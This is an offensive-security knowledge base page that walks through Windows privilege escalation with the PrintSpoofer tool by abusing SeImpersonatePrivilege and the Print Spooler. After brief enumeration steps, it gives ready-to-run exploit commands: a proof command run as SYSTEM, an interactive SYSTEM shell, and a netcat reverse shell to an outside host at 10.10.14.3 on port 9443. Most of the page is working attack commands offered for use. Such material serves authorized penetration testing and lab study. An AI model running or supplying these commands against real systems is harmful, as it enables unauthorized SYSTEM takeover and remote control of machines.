Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Privileges / SeImpersonatePrivilege

PrintSpoofer

PrintSpoofer abuses SeImpersonatePrivilege with Print Spooler behavior to execute a command as SYSTEM on compatible systems.

This is commonly service account to SYSTEM. The Print Spooler must be available, and endpoint controls may block the chain.

When enumerating PrintSpoofer opportunities, try to identify:

  • SeImpersonatePrivilege in the current token
  • Current context is a service account
  • Print Spooler running
  • Compatible Windows build
  • Writable staging directory
  • Payload execution method

Enumeration

Confirm the privilege:

whoami /priv

Confirm the Print Spooler is running:

sc query Spooler

Interesting findings include:

  • SeImpersonatePrivilege present
  • Spooler is running
  • Service account context
  • Tool execution is not blocked

Once confirmed, run a proof command before launching a full payload.

Exploit

Run a proof command:

PrintSpoofer.exe -c "cmd /c whoami > C:\Users\Public\spoofer.txt"

Confirm the result:

type C:\Users\Public\spoofer.txt

Spawn an interactive SYSTEM shell when the session supports it:

PrintSpoofer.exe -i -c cmd

Reverse shell variant:

PrintSpoofer.exe -c "C:\Windows\Temp\nc.exe 10.10.14.3 9443 -e cmd"